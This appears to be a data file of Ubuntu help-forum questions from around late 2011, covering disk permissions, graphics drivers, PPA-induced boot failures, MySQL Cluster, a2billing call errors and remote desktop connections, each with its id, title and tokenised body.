86063	how can i change the permissions of a mounted window share ?	i have a windows partition which i can easily access using nautilus . it automatically gets mounted at /media deel @ ubuntu : /media $ ls -l total 16 drwx -- -- -- 1 deel deel 16384 2011-11-16 10:33 new volume deel @ ubuntu : /media $ sudo chmod 755 new\ volume/ deel @ ubuntu : /media $ ls -l total 16 drwx -- -- -- 1 deel deel 16384 2011-11-16 10:33 new volume if you notice in above even after changing permissions the permissions have not changed . what could be the reason and how can i change the permissions ? here is my /etc/fstab file : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /host/ubuntu/disks/root.disk / ext4 loop , errors=remount-ro 0 1 /host/ubuntu/disks/swap.disk none swap loop , sw 0 0 ~
86065	ca n't update ubuntu , getting error message `` check internet connection . ''	internet connection is perfectly fine i have tried this for a few days now and it is still being stupid . please help .
86066	xubuntu - change default terminal windows size/layout	can someone help how to change default terminal windows size in xubuntu ? after some surfing , i found instructions for gnome . maybe i do n't understand , but xubuntu does n't use gnome ? thanks in advance .
86071	monitor settings always showup on secondary monitor . how to fix ?	i am using a secondary monitor connected to my laptop 's vga output . however , many app popup dialogs , including ubuntu 's display settings show up on that secondary monitor . this is very annoying because i use it for display and i can not easily see that monitor when working . i have unity menus on the laptop , which is supposed to be my primary . how can i enforce all new windows and monitor settings also show up on primary monitor ? i edited monitors.xml and added primary = yes to all displays which looked like laptop screens ( for some reason i have several configurations there ) . logged out and back in - same problem . see monitors.xml at http : //pastebin.com/zjgstabf
86072	how to change files permissions from a different hard drive ?	i installed yesterday ubuntu 11.10 on my 80gb hard drive and i ca n't change files permissions on my second hard drive . how to fix this ? ps : i have dual-boot with win7 mount : /dev/sda5 on / type ext4 ( rw , errors=remount-ro , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) dev/sdb1 on /media/600ca8ad0ca88020 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions )
86076	multiple ati graphics cards	i have a triple monitor setup on nvidia currently , but after having a number of difficulties with the nvidia drivers , i 'm thinking about jumping ship to amd graphics cards with eyefinity . i would like the possibility to switch to a quad monitor setup down the road , assuming that the ati drivers work reasonably after a few days of testing . since many of the graphics cards require special `` active '' display converters to convert displayport to dvi , i was wondering if it would be easier to install two lower end graphics cards in my system instead of getting a high end card that has 5/6 displayport connectors . currently i have 2 hdmi monitors , and one dvi monitor . i do n't need anything fancy in terms of performance ; just the ability to run 3 ( possibly 4 ) monitors at 1920x1080 w/ compiz enabled . is it possible to have multiple amd/ati video cards on an ubuntu machine ? update 2011-15-12 : i have installed a single radeon hd 6770 with 5 mini display port connectors , so i no longer have a need for multiple graphics cards .
86078	flash player settings dialog unclickable	i 'm using ubuntu 11.10 , firefox 8 , flash player 11 installed by software-center . i found i ca n't click the settings dialog of flash player . i click on the button but nothing happens . it 's a little similar with http : //ubuntuforums.org/showthread.php ? t=978212 , however i 'm a newbie and do n't know how to do it . can anyone help me and give a detail ?
86083	how to logout from public key authentication - ssh	i am using key based authentication for ssh . when ever i try to login into the system it does n't ask me for public key . it simply logs in , i just want to logout from this public key authentication . and when ever i need i will enable it . can some one say me the way to logout from public key authentication . and how to set timeout for this public key authentication ? thanks in advance .
86084	gnome shell in 11.10 - corrrupted panel and fonts	i recently installed gnome shell in ubuntu 11.10.. but top panel and fonts are look like corrupted.. ? can you help me please.. ? graphics card : ati radeon hd 4300/4500 series
86086	fsck ca n't find fsck.ntfs	on several machines that i 've upgraded from natty to oneiric , i get an error every boot ( one for every ntfs partition ) : serious errors were found while checking the disk drive for /windows/c . press i to ignore , s to skip mounting , or m for manual recovery following the suggestion in this answer , i ran fsck from the manual recovery shell . i got this output : fsck from util-linux 2.19.1 fsck : fsck.ntfs : not found fsck : error 2 while executing fsck.ntfs for /dev/sda1 i ca n't find fsck.ntfs , and command-not-found does n't help either . how can i make this error go away ? by the way , i 've tried booting into windows ( xp ) several times , thinking that windows would repair the filesystems . but apparently windows thinks the filesysystems are just fine . and it 's odd that all ntfs filesystems are affected . also , i can work around this problem by dropping to a recovery shell and issuing mount -a , but for my coworkers ' sakes i need unattended boot .
86089	unity app bar - move open programs to the top ?	im finally using unity in ubuntu 11.10 . ( yay ! ) i notice when i have some apps open , be it a pdf file , a doc file , a not commonly used app program , etc they are at the bottom of my unity bar . is there any way i can have all open apps appear at the top of my unity bar ? tia .
86095	does executing sudo su and su root do the same thing ?	what are the technical differences between the two ? the only thing i noticed is that sudo su requires you to enter your own password ( assuming you 're not root ) while su root requires you to enter root 's password . however both seem to log you into the root user account .
86098	in kde , how can i make totem the lowest priority program in all associated file types	i just installed the ubuntu-desktop package on kubuntu to try out unity , but now all my file associations have been stolen from my ( painstakingly optimised ) defaults ( amarok , k3b , dragon player ) to ( factory default ) things like totem , brasero and movie player . is there a way to quickly lower the priority of all of these programs without uninstalling them ? uninstalling does n't seem to be an option , as doing so wants to remove unity as well . thank you very much to anyone who can help me !
86100	ubuntu 11.10 dual screen , configuration of 1 touchscreen monitor	i have a problem to calibrate my touchscreen monitor in ubuntu 11.10 with 2 monitors in dual-screen , but only 1 touch device . i want to use only the touch monitor ( iiyama prolite t1731sr-1 ) to work on it , and the extended monitor to display an image . iâ´ve tried to conigurate the touch with the calibration tool ( egalax touch for kernel 3.0 ) but itâ´s shown on both monitors . so if i only use the touch to calibrate , the cursor reaches over both screens . i think in the older version of the calibration tool for kernel 2.6 it was possible to choose , which device is the touch device . in this tool there is no possibility to choose . have anyone an idea , how to realize this configuration ? thanks for your help !
86102	windows server 2008 r2 standard terminal server and ubuntu 11.10 - how do i backup from my own pc on remote desktop ?	we have ubuntu 11.10 pcs as workstation at our office . i access my accounting program , pastel , using rdp . the server where it 's running on is windows server 2008 r2 standard terminal server . at present when i need to do my backups for pastel , i have to physically insert the usb into the server in our data centre . this is not ideal because of access restrictions . my question â how do i backup from my own pc on remote desktop ? surely it should be possible to insert into the local usb but backup a file on the remote server ? is there some other way of accessing the drive locally ?
86104	how to remove module from kernel using -r or rmmod ?	i have a card installed , which causing not to get ip address automatically using dhcp . so i need to remove that card completely for the moment . i tried as below but its not working how can i remove it ? $ lsmod | card card 45555 2 $ modprobe -r card fatal : module card is in use . $ rmmod card fatal : module card is in use .
86105	nvidia - graphics interface not loading at startup	when i start up ubuntu ( 11.10 ) , no graphical interface loads . this is the case both in normal and recovery mode . instead i 'm being presented with a console , logged as 'root @ ubuntu ' . from there i can call exit and then log into my default ( and only ) account , and once there i can load the unity with the command startx but to get to unity i have to repeat above everytime i start up the pc . i hope some of the details below might be able to indicate what 's exactly the problem . i tried several solutions i found on the web , but to no avail . my graphics card : nvidia geforcegt 540m result of typing in console : unity warning : no display variable set , setting it to :0 unity-panel-service : no process found compiz ( core ) - fatal : could n't open display :0 result of typing nvidia-settings error : the control display is undefined ; please run 'nvidia-settings -- help ' for usage information . content of default xorg.conf : section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection content of xorg.conf created with nvidia-xconfig # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 280.13 ( buildmeister @ swio-display-x86-rhel47-03.nvidia.com ) wed jul 27 17:15:58 pdt 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection the problem occurs with both xorg.conf versions . i tried installing , purging , reinstalling nvidia drivers , editing blacklist as per nvidia drivers not working after upgrade . why can i only see terminal ? all to no avail . i would greatly appreciate any pointers that would help me resolve the issue . the reason i tried messing with nvidia drivers in the first place is that some gtk/opengl stuff did n't work correctly . in particular , the xorg.0.log contains the following error : ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) well , fixing the lack of any desktop whatsoever is the priority , but should you happen to know how i might be able to resolve the glx extension problem , i would be happy to keen to hear you out .
86109	how do i export recordings in mythbuntu ?	i would like to copy all recordings of a certain show to a folder so i can transfer them to another computer and watch them `` offline '' . mythtv stores all recordings in a single folder in files titled `` 2609_20111111093000.nuv '' which makes finding all the episodes i want a daunting task . i tried using mytharchive but it seemingly oriented at burning files to dvds . in addition , my mythtv crashes when i try to use mytharchive . i 'm not particularly concerned with converting/recompressing files , just copying them would be enough .
86111	starting nodejs application on server start gives exit with code 2	i 'm running the below on server startup : exec sudo -e -u www-data /usr/bin/node /etc/nodeserver/app.js > > /var/log/applicationserver.log 2 > & 1 the console writes many messages that the start exited with the code 2 . the application is still started in the end . where can i find information about the exit codes for nodejs ?
86112	compiz grid plugin places window on two virtual desktops	when i use the `` put right '' function of the compiz grid plugin to maximize a window on the right half of a desktop , a two-pixel stripe of the window ends up on the next virtual desktop just to the right . the window then appears on two desktops simultaneously , which is a bit inconvenient to handle . `` put left '' works fine , interestingly . i run 11.10 with unity . any idea if that is a known bug ?
86113	how can i detect the bpm ( beats per minute ) of a song ?	for some activities such as running it is important to know how many bpm a song has . i know that banshee can do this but i could n't figure out how to do this for a selected range of songs . which tool can i use to detect the bpm and immediately tag this in the id3 fiels of the corresponding files ?
86114	extremely slow internet wired connection in asus x101h , ubuntu 11.10	my ethernet connection is very slow ( it was also with 11.04 ) . it works fine with another pc with xp . also , wifi is ok in ubuntu . i 've checked several help pages , but nothing seems to work : the connection is slow for the update manager too , so the firefox settings i changed obviously did nothing . it is not the ipv6 ( set to ignore ) either . the ipv4 method set to automatic ( dhcp ) does n't work at all . in manual method , with addresses and dns copied from my other computer : address : 192.168.1.156 netmask : 255.255.255.0 gateway : 192.168.1.1 dns servers : 203.176.128.10,203.176.128.11 it establishes a connection but then it is really slow . sometimes it works fine for brief periods of time , then stops again . i also updated the bios . ... and also installed bind9 . i 'm connected to a apartments building 's connection , so i do n't have access to the router , etc . the ethernet controller is atheros ar8152 v2.0 ( rev c1 ) . at the network information it says that the driver is `` atl1c '' , which i also updated ( or installed , i 'm not sure now ) . my wife is getting really pissed off and i do n't know where else to look . any help would be appreciated .
86118	screen turns gray on boot after install of a ppa	problem i recently added ppa : eugenesan/ppa to my maverick installation to install smartgit . right after apt-get listed a bunch of updates that i immediately installed . after rebooting i noticed that grub changed . the new version of grub is 1.99~rc1-2ubuntu1~eugenesan~maverick1 . booting up my system i had to admit that it no longer launches the login screen . it still shows the ubuntu logo ( new style also ) but after that the screen turns gray . solution ideas i already found the apt-get history under /var/log/apt/history.log and it lists all the software that came with the new repository . the list is huge . further , i read that ppa-purge can uninstall a repository and all its software . i am not sure if i understood right since it does not affect the grub version installed . that would be the easiest to see . can you help me to fix my system ? i have access to the command line . vague solution steps thanks to lekensteyn . in the meantime i read and tried what was written in the other thread . nonetheless , i can not uninstall the software version that came by eugenesan . this is what i tried : sudo ppa-purge ppa : eugenesan/ppa rm /etc/apt/sources.list.d/eugenesan ... moreover , i found out that a `` previous linux version '' boots up normally . the default grub entries are ubuntu , with linux 2.6.35-31-generic and .. ( recovery mode ) - the couple that does not boot up . but when i choose ubuntu , with linux 2.6.35-30-generic from the list , everything works fine . do you understand what happens ? could it be that the graphic resolution is just set wrong or do you think grub is the problem ? installation log to give a complete overview i got the history.log for apt-get . this is what happened in the meantime . # ***** /var/log/apt/history.log ***** start-date : 2011-12-07 19:33:18 commandline : apt-get install smartgit install : smartgit : amd64 ( 2.1.4-0~eugenesan~maverick9 ) end-date : 2011-12-07 19:33:36 start-date : 2011-12-07 19:50:00 install : libfile-desktopentry-perl : amd64 ( 0.04-2 ) , isc-dhcp-client : amd64 ( 4.1.1-p1-15ubuntu3.2~eugenesan~maverick1 ) , ttf-fixedsys-excelsior : amd64 ( 3.0-1ubuntu2~eugenesan~maverick2 ) , libfile-mimeinfo-perl : amd64 ( 0.15-1 ) , isc-dhcp-common : amd64 ( 4.1.1-p1-15ubuntu3.2~eugenesan~maverick1 , automatic ) , p7zip-full : amd64 ( 9.04~dfsg.1-1 ) upgrade : meld : amd64 ( 1.3.2-1ubuntu1 , 1.5.0-0ubuntu1~eugenesan~maverick1 ) , codeblocks : amd64 ( 10.05-0ubuntu1 , 10.05-1~eugenesan~maverick1 ) , git-all : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , libglib2.0-data : amd64 ( 2.26.1-0ubuntu1 , 2.28.0-0ubuntu1~eugenesan~maverick1 ) , git-daemon-run : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , network-manager-gnome : amd64 ( 0.8.1+git.20100809t190028.290dc70-0ubuntu3 , 0.8.3+git.20110203t003354.9bf0b98-0ubuntu1~nmt1~maverick ) , git-doc : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , git-cvs : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , git-gui : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , rubygems : amd64 ( 1.3.7-2 , 1.5.3-0~eugenesan~maverick2 ) , libnm-util1 : amd64 ( 0.8.1+git.20100810t184654.ab580f4-0ubuntu2 , 0.8.3+git.20110201t160144.9b61ec7-0ubuntu1~nmt2~maverick ) , git-man : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , screen : amd64 ( 4.0.3-14ubuntu4 , 4.1.0git066b098-0~eugenesan~maverick3 ) , libpcre3 : amd64 ( 8.02-1 , 8.12-1~eugenesan~maverick1 ) , hotot : amd64 ( 0.9.7~git-1259-g63e05cf-0ubuntu0ppa1~maverick1 , 0.9.7~git-1280-g9b00609-0ubuntu0ppa1~maverick1 ) , git-svn : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , libsoup-gnome2.4-1 : amd64 ( 2.31.92-0ubuntu1.1 , 2.32.2-2ub~eugenesan~maverick1 ) , grub-pc : amd64 ( 1.98+20100804-5ubuntu3.3 , 1.99~rc1-2ubuntu1~eugenesan~maverick1 ) , libglib2.0-0 : amd64 ( 2.26.1-0ubuntu1 , 2.28.0-0ubuntu1~eugenesan~maverick1 ) , git-email : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , network-manager : amd64 ( 0.8.1+git.20100810t184654.ab580f4-0ubuntu2 , 0.8.3+git.20110201t160144.9b61ec7-0ubuntu1~nmt2~maverick ) , gitweb : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , git : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , libnm-glib2 : amd64 ( 0.8.1+git.20100810t184654.ab580f4-0ubuntu2 , 0.8.3+git.20110201t160144.9b61ec7-0ubuntu1~nmt2~maverick ) , codeblocks-common : amd64 ( 10.05-0ubuntu1 , 10.05-1~eugenesan~maverick1 ) , rdesktop : amd64 ( 1.6.0-3ubuntu2.1 , 1.7.0-1ubuntu2~eugenesan~maverick1 ) , libglib2.0-bin : amd64 ( 2.26.1-0ubuntu1 , 2.28.0-0ubuntu1~eugenesan~maverick1 ) , git-el : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , libglib2.0-dev : amd64 ( 2.26.1-0ubuntu1 , 2.28.0-0ubuntu1~eugenesan~maverick1 ) , xdg-utils : amd64 ( 1.0.2+cvs20100307-1ubuntu0.3 , 1.1.0~rc1-2~eugenesan~maverick1 ) , initramfs-tools : amd64 ( 0.98.1ubuntu6.1 , 0.99ubuntu2.1~eugenesan~maverick1 ) , y-ppa-manager : amd64 ( 0.0.8.4-1~webupd8~maverick3 , 0.0.8.5-1~webupd8~maverick ) , codeblocks-contrib : amd64 ( 10.05-0ubuntu1 , 10.05-1~eugenesan~maverick1 ) , git-arch : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , gitk : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , dhcp3-client : amd64 ( 3.1.3-2ubuntu6.3 , 4.1.1-p1-15ubuntu3.2~eugenesan~maverick1 ) , libcodeblocks0 : amd64 ( 10.05-0ubuntu1 , 10.05-1~eugenesan~maverick1 ) , rubygems1.8 : amd64 ( 1.3.7-2 , 1.5.3-0~eugenesan~maverick2 ) , python-support : amd64 ( 1.0.9ubuntu1 , 1.0.10ubuntu3~eugenesan~maverick1 ) , git-core : amd64 ( 1.7.7.2-1~ppa0~maverick1 , 1.7.8-0ppa1~maverick1 ) , ttf-mscorefonts-installer : amd64 ( 3.2ubuntu2 , 3.3ubuntu4~eugenesan~maverick4 ) , shutter : amd64 ( 0.88~ppa4~maverick1 , 0.88.1~ppa3~maverick1 ) , handbrake-gtk : amd64 ( 4370svnppa1~maverick1 , 4373svnppa1~maverick1 ) , python-gdata : amd64 ( 2.0.8-1.1 , 2.0.13-1~eugenesan~maverick1 ) , grub-common : amd64 ( 1.98+20100804-5ubuntu3.3 , 1.99~rc1-2ubuntu1~eugenesan~maverick1 ) , libjson-glib-1.0-0 : amd64 ( 0.10.2-2ubuntu2.1 , 0.12.2-0ubuntu1~eugenesan~maverick1 ) , libwxsmithlib0 : amd64 ( 10.05-0ubuntu1 , 10.05-1~eugenesan~maverick1 ) , ppa-purge : amd64 ( 0.2.8+bzr56~webupd8~maverick , 0.2.8+bzr59-0~61~maverick1 ) , initramfs-tools-bin : amd64 ( 0.98.1ubuntu6.1 , 0.99ubuntu2.1~eugenesan~maverick1 ) , dhcp3-common : amd64 ( 3.1.3-2ubuntu6.3 , 4.1.1-p1-15ubuntu3.2~eugenesan~maverick1 ) , libsoup2.4-1 : amd64 ( 2.31.92-0ubuntu1.1 , 2.32.2-2ub~eugenesan~maverick1 ) error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2011-12-07 20:03:24 start-date : 2011-12-08 11:31:33 commandline : apt-get remove error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2011-12-08 11:31:35 start-date : 2011-12-08 11:37:57 commandline : apt-get install ppa-purge error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2011-12-08 11:37:58 start-date : 2011-12-08 11:38:59 commandline : apt-get remove rubygems1.8 remove : rubygems : amd64 ( 1.5.3-0~eugenesan~maverick2 ) , rubygems1.8 : amd64 ( 1.5.3-0~eugenesan~maverick2 ) end-date : 2011-12-08 11:39:08 start-date : 2011-12-08 12:01:08 commandline : apt-get purge screen purge : ubuntu-desktop : amd64 ( 1.207 ) , byobu : amd64 ( 3.5-0ubuntu1.1 ) , ubuntu-netbook : amd64 ( 2.035 ) , screen : amd64 ( 4.1.0git066b098-0~eugenesan~maverick3 ) end-date : 2011-12-08 12:01:20 all entries from start-date : 2011-12-08 11:31:33 and later are already me trying to fix the system . there seems to be an error in the initial `` eugenesan-installation '' kernel under suspicion could it be that kernel 2.6.35-31 is not working on my machine ? i can not see an installation had happened in the history.log , though . in case i want to remove the kernel i found an article on how to remove a grub menu entry .
86120	how do i set up mysql cluster ?	i am trying to setup mysql-cluster-gpl-7.1.17-linux-i686-glibc23.tar.gz on ubuntu 10.04 server for the past 3 weeks and not successful yet . the links i followed are : http : //stepbysteparticles.com/index.php ? option=com_content & view=article & id=48 & itemid=54 http : //cyrenity.wordpress.com/2010/08/12/howto-setup-mysql-cluster-beginners-tutorial/ http : //tech.jocke.no/2011/03/13/mysql-cluster-how-to-with-load-balancing-failover/ http : //www.lod.com/whitepapers/mysql-cluster-howto.html http : //blog.rimuhosting.com/2011/07/06/building-database-clusters-with-mysql/ all the configurations in the above links are almost same with some slight changes and i just gave a try of all if any works but none . i already made a post in serverfault but i am still could not able to make it work . i always come back here if nothing works out after many tries and now i am . also i am not understanding whether mysql-server or mysql-client need to be installed along with mysql-cluster else mysql-cluster alone is enough for running mysqld on sql nodes . in my case the setup is 3 nodes= ( data1+sql1 + data2+sql2 + mgmt node ) . frequent errors : /etc/init.d/mysql.server start output : starting mysql * could n't find mysql manager ( /usr/bin/mysqlmanager ) or server ( /usr/bin/mysqld_safe ) i even tried copying /usr/local/mysql/bin/* to /usr/bin but still no use as it was telling . * manager of pid-file quit without updating file . while trying to start ! while trying to start mysql daemon on data/sql node cd /usr/local/mysql ./bin/mysqld_safe -- user=mysql -- defaults-file=/etc/my.cnf & output : [ 1 ] 2338 root @ web2 : /usr/local/mysql # 111208 15:53:47 mysqld_safe logging to syslog . 111208 15:53:47 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql 111208 15:53:47 mysqld_safe mysqld from pid file /var/lib/mysql/web2.pid ended [ 1 ] + done ./bin/mysqld_safe -- user=mysql -- defaults-file=/etc/my.cnf anybody take up and help me here please ? . anybody clarify if there is any problem with ubuntu or with cluster config ? . i have to implement this on cloud servers once i am successful . thank you ! update:1 now on sql/data nodes i have had already removed mysql-server and mysql-client which i generally install as a basic package of any fresh installation . i removed them by running following command and on both of the nodes only mysql-cluster is available which i could not able to setup : apt-get remove mysql-client mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 update:2 i have fixed the issues i had . now i have the following things left to be done . what is the best method to add/remove mgmt , sql/data nodes being online ? edit : i tried mysql docs for adding nodes online but confused and did n't work unless i shutdown all the nodes and remove the logs under /var/lib/mysql-cluster on all the nodes . what additional configurations should i include in my my.conf file for best performance tuning like datamemory and indexmemory , if anybody using for production , can recommend or paste it here please ? update:3 how to convert all the table engines of the database to ndb which are having foreign keys also ? edit : i found a script for converting all the table engines but all the tables of my database are not converted as for the error : error 1217 ( 23000 ) at line 11 : can not delete or update a parent row : a foreign key constraint fails is there a way to possess both the features of ndb & innodb with cluster and multi-master replication with no risk ( down time ) ?
86124	lost all permissions to my ntfs partition	i have lost `` write '' permission for myself , and all other permissions for 'others ' and 'group ' on my important ntfs partition ( contains all my data ) . any amount of chmod ( ing ) or using the gui to set it right is n't working . i get this error when doing it the gui way . ( no other details of why it could n't set permissions is mentioned ) . and this happens when doing it in cli . this is quite an issue need help fast . output of cat /etc/fstab output of dmesg | tail
86126	why is the printing setting is different in gnome shell vs . unity ?	why the printing setting is different in gnome shell vs . unity in 11.10 ? hey folks , i believe this is even a bug - more than a question . but i want to refine it before posting in launchpad . under ubuntu 11.10 , unity has a printing menu that looks like this : yet in the shell , it looks rather like this : i connected my laptop ( dell inspiron 1525 ) to the wireless university printing system ( lpd ) very simply under ubuntu 10.04 , and after reinstalling 11.10 - under it as well . the problem is - under unity it worked out-of-the-box ( just as it was in 10.04 ) , yet under gnome shell it did n't . furthermore , printing under shell does n't send it to print , yet under unity it prints just fine.. i like both de - but prefer shell as of today . why is the printing issue different.. ? cheers ,
86130	how to monitor what ubuntu one is doing ?	is there a way to monitor what ubuntu one is doing when it seems to be chewing up so much network bandwidth ? i 'd like to see what files it 's syncing . i looked in ~/.cache/ubuntuone/log but ca n't find anything that shows this .
86131	asterisk and a2billing `` q931_disconnect_code_21 '' error when dialing out	i have been trying to get a2billing to work for the past 4 days now , i followed 4 tutorials and they all gave me some insight into how things work.. but the a2billing is still not working.. my asterisk works fine , freepbx i can make extension and place calls on trunks ok , internals perfect ... i installed a2billing.. the admin , user , agents.. all that works - i can log in add rates , trunks , the simulator get the correct routes , rates and trunks.. i can make a user log in using a sip device.. but for the love of god.. every single time i dial i get error q931_disconnect_code_21 isdn code says -- cause no . 21 - call rejected . this cause indicates that the equipment sending this cause does not wish to accept this call . although it could have accepted the call because the equipment sending this cause is neither busy nor incompatible . this cause may also be generated by the network , indicating that the call was cleared due to a supplementary service constraint . the diagnostic field may contain additional information about the supplementary service and reason for rejection . which means the host ( a2billing and asterisk ) knows about the call but activbely denied routing the call.. in the simulator i use the same number that works in there on my sip . i am on ubuntu 10.4lts - asterisk was installed using apt-get - > /usr/share/asterisk but i also have a /var/lib/asterisk i made a ln -s to /usr/src/a2billing/agi/a2billing.php /usr/share/asterisk/agi-bin ( the asterisk conf defines this as the agi location-and freepbx time , freebpx echo works ) another problem is that a2billing has not made 1 single log file and i can not determine what the heck is going on ( the permissions are set write global and belong to asterisk ) .. asterisk logs are clean.. sip , trunks are all registered . i connect to a2billing user , place call -- silence . and just error q931 ( zoiper on iphone ) if i use the freepbx extension i can talk with anybody iusing freepbx routes . i followed this guide http : //www.data4ict.com/tutorials/a2billing/a2billing.asp basically i skipped freepbx out of the picture , so its just asterisk direct to a2billing.. and all the steps and verifications are just like he shows ( execpt i use /usr/share/asterisk instead of /var/lib/asterisk ... ? ? .. step by step idiot tutorial and i still cant get it working . i set all the version to 1_6 , permissions are good- i even wrote test into the a2billing_agi.log and it shows the test string on the admin end.. but never writes anything to the log file . apache2 runs runs as www-data : www-data asterisk runs as asterisk : asterisk freepbx ( i disabled it for now but runs as asterisk ) i made links to both var and usr agi-bin folder back to placed the a2billing.php with the lib link my current config is like the ones in the turorial extensions , sips , iax'as ~ # php -v php deprecated : comments starting with ' # ' are deprecated in /etc/php5/cli/conf.d/mcrypt.ini on line 1 in unknown on line 0 php 5.3.2-1ubuntu4.10 with suhosin-patch ( cli ) ( built : oct 15 2011 00:09:58 ) copyright ( c ) 1997-2009 the php group zend engine v2.3.0 , copyright ( c ) 1998-2010 zend technologies asterisk -v asterisk 1.8.8.0~rc4-1digium0+1~lucid , copyright ( c ) 1999 - 2011 digium , inc. and others . created by mark spencer asterisk comes with absolutely no warranty ; type 'core show warranty ' for details . this is free software , with components licensed under the gnu general public license version 2 and other licenses ; you are welcome to redistribute it under certain conditions . type 'core show license ' for details . ========================================================================= running as group 'asterisk ' running as user 'asterisk ' unable to access the running directory ( permission denied ) . changing to '/ ' for compatibility . asterisk already running on /var/run/asterisk/asterisk.ctl . use 'asterisk -r ' to connect.. asterisk 1.8.8.0~rc4-1digium0+1~lucid a2billing 1.9.4 ( cuprum ) has anybody have any suggestion how to debug what is going on . maybe if i can jsut get the logs to work that will help.. i am really bumbed out now .. 5days later . or is there a ready to go a2billing distro i dont know about maybe ... . edit so i rented a freelancer ( experienced ) ... he sat like 4 hours , doing wierd comamnds and things ... still not fixed.. im just going to format and redo the while thing - it seems like i must have missed something
86133	libreoffice theme integration not working ( xubuntu )	i am running xubuntu 11.10 and everything works nicely . i have selected a nice xfce theme and everything looks beautiful , except libreoffice . while other programmes ( gimp , inkscape , thunar etc . ) integrate with the selected appearance & window manager theme , libreoffice looks like a windows 98 programme . does anyone know how to fix this ? i have already tried this solution , without success : http : //ubuntuforums.org/showthread.php ? t=1584010 & page=2 thanks for your help !
86138	how to shutdown/restart/suspend ... without authentication or confirmation ?	i am looking for a terminal command to shutdown without having to write down my password and without installing any extra programs . as when clicking the shutdown button , why it is not asking me for the password and a program like gnome-pie that shutdown without asking me for the password and without confirmation . i want this command as i am a java programmer and i want to make use of it .
86139	what is the dash equivalent for .bashrc ?	where should i put personal shell configurations when using dash ?
86141	will installing ubuntu harm my computer ?	i installed ubuntu using wubi on hp dv6-6135dx . when i boot into ubuntu , i get a black screen . the wireless light turns blue after a while , meaning ubuntu has loaded the driver , but the screen stays turned off . when i first booted into wubi i got a black screen with white screen with text that said generating locales ... done . warning : not compatible with locale us.utf8 ... . it stayed stuck at this screen , so i hard shut down the computer after about a half hour . now wubi wo n't boot . i 'm considering dual-booting , but will ubuntu actually start ? can ubuntu mess up my windows 7 installation ?
86147	need driver for alps touchpad on a vaio f2 vpcf2190x that supports multi-touch	i have a sony vaio vpcf2190x with an alps multi-touch trackpad , and i ca n't use multi-touch . is there a resolution ?
86148	how to connect to windows server 2008 remote desktop with network level authentication required	i want to connect via remote desktop to a windows server 2008 r2 . on the windows server 's remote desktop connection properties , it is set to `` safer '' . specifically , the selected option is `` allow connections only from computers running remote desktop with network level authentication . '' on my ubuntu system , i tried using remmina to connect to the windows server . remmina can not connect to that server with the option `` network level authentication '' ( as mentioned in the previous paragraph ) . the error message remmina returns is as follows : disable the connection to the server rpd : ipwindowsserver2008 how can i connect remmina ( or another program ) by remote desktop to a windows server 2008 host with the `` network level authentication '' option selected ?
